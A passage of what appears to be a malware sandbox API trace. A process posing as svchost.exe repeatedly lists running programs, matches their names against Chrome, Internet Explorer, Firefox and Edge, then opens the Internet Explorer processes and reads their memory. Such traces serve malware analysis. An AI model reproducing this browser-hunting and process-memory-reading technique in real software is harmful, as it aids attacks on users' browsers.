	[0194.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.719] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.719] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0194.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.720] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0194.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xd5c
	[0194.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.721] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0194.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.722] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.722] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0194.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.722] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.722] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0194.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xd60
	[0194.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.723] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0194.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.723] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.724] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0194.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.724] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0194.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xd64
	[0194.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.729] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0194.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.729] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.730] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0194.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.730] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0194.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xd68
	[0194.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.731] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0194.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.732] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.732] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0194.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.733] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0194.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xd6c
	[0194.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.734] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0194.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.735] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.735] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0194.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.736] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0194.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xd70
	[0194.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.737] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0194.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.737] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.738] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0194.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.739] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.740] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0194.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xd74
	[0194.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.741] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0194.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.741] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.742] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0194.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.742] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.742] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xd78
	[0194.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.743] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.743] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.744] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.744] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.744] NtQueryInformationProcess (in: ProcessHandle=0xd78, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.744] ReadProcessMemory (in: hProcess=0xd78, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.744] ReadProcessMemory (in: hProcess=0xd78, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.744] ReadProcessMemory (in: hProcess=0xd78, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.744] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xd7c
	[0194.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.745] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.746] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.746] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.746] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.746] NtQueryInformationProcess (in: ProcessHandle=0xd7c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.746] ReadProcessMemory (in: hProcess=0xd7c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.746] ReadProcessMemory (in: hProcess=0xd7c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.747] ReadProcessMemory (in: hProcess=0xd7c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.747] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xd80
	[0194.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.748] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.748] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.748] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.748] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0194.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xd84
	[0194.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.749] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0194.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.750] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.750] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0194.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.750] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xd88
	[0194.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.752] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.752] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.752] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.752] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.753] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.753] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0194.754] CloseHandle (hObject=0x188) returned 1
	[0194.754] Sleep (dwMilliseconds=0x64) 
	[0194.860] GetCurrentProcessId () returned 0x110
	[0194.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0194.863] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0194.864] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0194.865] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0194.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xd8c
	[0194.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.866] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.867] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.867] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.868] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.868] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xd90
	[0194.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.869] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.870] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.870] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.870] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.871] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0194.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xd94
	[0194.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.872] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0194.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.872] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.873] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0194.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.873] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xd98
	[0194.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.875] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.875] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.876] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.876] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0194.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xd9c
	[0194.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.878] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0194.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.878] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.879] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0194.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.879] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.879] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0194.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xda0
	[0194.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.880] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0194.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.881] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.882] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0194.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.882] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.882] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0194.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xda4
	[0194.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.883] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0194.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.884] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.884] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0194.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.885] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.885] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0194.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xda8
	[0194.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.886] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.886] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.887] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.888] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.888] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xdac
	[0194.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.890] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.891] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.892] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.892] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
